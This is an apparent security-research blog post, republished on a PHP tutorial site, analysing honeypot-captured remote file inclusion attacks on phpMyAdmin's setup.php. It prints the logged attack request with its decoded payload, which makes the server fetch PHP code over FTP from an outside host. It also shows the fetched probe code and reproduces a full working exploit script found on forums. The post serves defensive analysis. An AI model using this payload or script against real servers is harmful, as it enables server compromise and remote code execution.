ホームページ > php教程 > php手册 > PhpMyAdmin setup.php RFI Attacks Detected

PhpMyAdmin setup.php RFI Attacks Detected

WBOY
リリース: 2016-06-06 20:00:39
オリジナル
1338 人が閲覧しました

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our centralModSecurity AuditConsole logging host today and I noticed

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks.  I was looking in our central ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.

PhpMyAdmin setup.php RFI Attacks Detected

Let's look at the raw ModSecurity audit log data of the inbound request:

--4064df0e-A--
[10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80
--4064df0e-B--
POST /pma/scripts/setup.php HTTP/1.1
Connection: close
Host: 176.34.207.219
Referer: 176.34.207.219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

--4064df0e-C--
action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D
ログイン後にコピー

If we URL decode the request body data, we get this:

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:
{<span><strong>s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt"</strong></span>;}}
ログイン後にコピー

As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site.  The contents of the id.txt file is PHP code:

<?php print(base64_decode("c3Q0cjc="));
echo(php_uname());
print(base64_decode("ZjFuMTVo"));
die;
?>
ログイン後にコピー

Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack.  If the application responds with the output from these PHP commands, then the attacker will proceed with other attacks.  SpiderLabs Research was able to find the following script in public forums that launch similar attacks:

/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */
$arguments = getopt("a:b:c");

$pma_setup_url = $arguments[a];
//echo $arguments[a];
$ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt';

//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url;
$path = $parsed_url;
$query = $parsed_url;

($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';

$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);

while (!feof($fp))
{
if($feof_count >=200)
break;

$return .= fread($fp, 4800);
++$feof_count;
}

fclose($fp);
return $return;
}

$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');

preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array);

$token = $token_array[1];

preg_match_all('@Set-Cookie: (<span>^\r\n;</span>+)@is',$token_page,$cookie_array);

$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);

print
send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');
ログイン後にコピー

 This issue was patched in the php source code with the following update:

PhpMyAdmin setup.php RFI Attacks Detected
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のおすすめ
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート